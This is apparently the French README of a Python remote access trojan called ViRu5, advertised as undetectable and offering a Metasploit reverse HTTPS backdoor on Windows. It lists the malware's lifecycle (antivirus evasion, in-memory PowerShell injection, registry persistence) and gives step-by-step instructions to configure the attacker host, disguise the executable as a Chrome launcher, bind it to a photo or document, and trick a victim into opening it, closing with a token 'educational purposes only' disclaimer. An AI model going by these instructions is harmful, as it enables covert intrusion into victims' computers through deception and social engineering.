python-rootkit
Ceci est un RAT python complètement indétectable qui peut contourner presque tous les antivirus et ouvrir une porte dérobée dans n'importe quelle machine windows qui établira une connexion Metasploit HTTPS inversée vers votre machine d'écoute.
Cycle de vie de ViRu5
- Contourner tous les antivirus.
- Injecter un script PowerShell malveillant en mémoire.
- Établir une connexion HTTPS inversée vers la machine de l'attaquant.
- Vérifier toutes les 10 secondes que la connexion existe toujours, sinon, en établir une nouvelle.
- Ajouter une clé de registre de démarrage pour se reconnecter à l'attaquant après un redémarrage.
Étapes
- Mettre à jour les paramètres de viRu5/source.py avec votre lhost et lport
- Renommer source.py en GoogleChromeAutoLaunch.py
- Ajouter GoogleChromeAutoLaunch.py, setup.py et votre icône en tant que icon.ico dans le répertoire c:\python27
- Depuis cmd, faites :
cd c:\python27 && python setup.py py2exe
- Trouvez le fichier RAT dans le répertoire Dist.
- Associez-le à une photo, un pdf, un word ou tout autre type de fichier
- Envoyez-le à la victime
- Utilisez vos compétences en ingénierie sociale pour lui faire ouvrir les fichiers
- Vous recevrez une connexion Metasploit HTTPS inversée :)
Testé sur
- Windows 7 x64/x86
- Windows 8
- Windows 8.1 x64/x86
- Windows 10 x64/x86
Remerciements
Merci à tous les chercheurs en sécurité qui passent du temps à aider les gens et à rendre la communauté plus puissante. Merci aux gars de powerShellEmpire.
Avertissement
Ceci est UNIQUEMENT à des fins éducatives. Tout d'abord, ce code vise à alerter les gens sur les problèmes de sécurité infectant les machines non corrigées.